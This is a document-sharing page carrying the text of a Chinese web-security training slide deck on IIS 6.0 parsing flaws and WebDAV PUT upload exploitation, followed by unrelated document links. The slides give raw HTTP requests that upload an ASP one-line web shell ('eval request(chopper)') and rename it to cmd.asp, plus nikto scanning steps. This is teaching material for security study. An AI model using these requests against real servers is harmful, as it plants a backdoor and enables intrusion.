原创力文档- 6
- 0
- 约1.04千字
- 约 15页
- 2024-03-24 发布于陕西
- 举报
Web攻防训练营中间件解析漏洞-IIS6.0
1.IIS6.0解析漏洞介绍2.IIS6.0PUT上传原理3.IIS6.0PUT上传探测4.IIS6.0PUT上传利用课程内容
01IIS6.0解析漏洞介绍
IIS6.0解析漏洞介绍(1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件解析。%=NOW()%(2)当文件*.asp;1.jpgIIS6.0同样会将文件作为asp文件解析。微软目前也没有推出补丁,不认为是一个漏洞。下面在IIS6.0中演示这两个解析漏洞
02IIS6.0PUT上传原理
IIS6.0PUT上传原理WebDAV基于HTTP1.1协议的通信协议使得HTTP支持PUTMOVECOPYDELETE方法。1、探测是否存在IISPUT漏洞:OPTIONS/HTTP1.1Host:2、上传txt文本文件PUT/a.txtHTTP1.1Host:Content-Length:30%evalrequest(chopper)%3、通过Move或Copy重名COPY/a.txtHTTP1.1Host:Destination:/cmd.asp4、删除DELETE/a.txtHTTP1.1Host:
03IIS6.0PUT上传探测
IIS6.0PUT上传探测利用nikto探测-nikto-hIP地址
04IIS6.0PUT上传利用
IIS6.0PUT上传利用利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
IIS6.0PUT上传利用利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
IIS6.0PUT上传利用利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
IIS6.0PUT上传利用利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
1.IIS6.0解析漏洞介绍2.IIS6.0PUT上传原理3.IIS6.0PUT上传探测4.IIS6.0PUT上传利用总结
再见欢迎关注Web安全训练营课程
您可能关注的文档
- Web攻防视频教程第一节 命令执行介绍-01.pdf
- Web攻防视频教程第一节 命令执行介绍-01.pptx
- Web攻防视频教程第一节 收集Whois信息-01.pdf
- Web攻防视频教程第一节 文件上传-绕过JS验证-01.pdf
- Web攻防视频教程第一节 文件上传-绕过JS验证-01.pptx
- Web攻防视频教程第一节 中间件解析漏洞-IIS6.0-01.pdf
- Web攻防视频教程第一节 自动化xss挖掘介绍-01.pdf
- Web攻防视频教程第一节 自动化xss挖掘介绍-01.pptx
- Web攻防视频教程逻辑漏洞 - 密码重置(简单验证码)-01.pdf
- Web攻防视频教程逻辑漏洞 - 密码重置(简单验证码)-01.pptx
最近下载
- 建筑室内施工图深化设计梁佳慧建筑工程系57课件讲解.pptx VIP
- 2024年世界职业院校技能大赛高职组“市政管线(道)数字化施工组”赛项考试题库资料.pdf
- 1.1 搭建生命体的“积木”(课件)-五年级科学下册(苏教版).pptx VIP
- 三年级数学面积应用题专项练习题.doc VIP
- 【CNAS CL01 2018内部管理评审报告】 2018年IEC17025 检测和校准实验室能力认可准则管理体系审核资料.docx VIP
- 2025年房地产经纪人房产税与相关税种(城镇土地使用税、契税)辨析专题试卷及解析.pdf VIP
- 空天科技机器征途.ppt
- 第六章 人类与土壤圈.doc VIP
- 地震演练总结通用5篇.doc VIP
- 建筑室内施工图深化设计梁佳慧建筑工程系36课件讲解.pptx VIP
文档评论(0)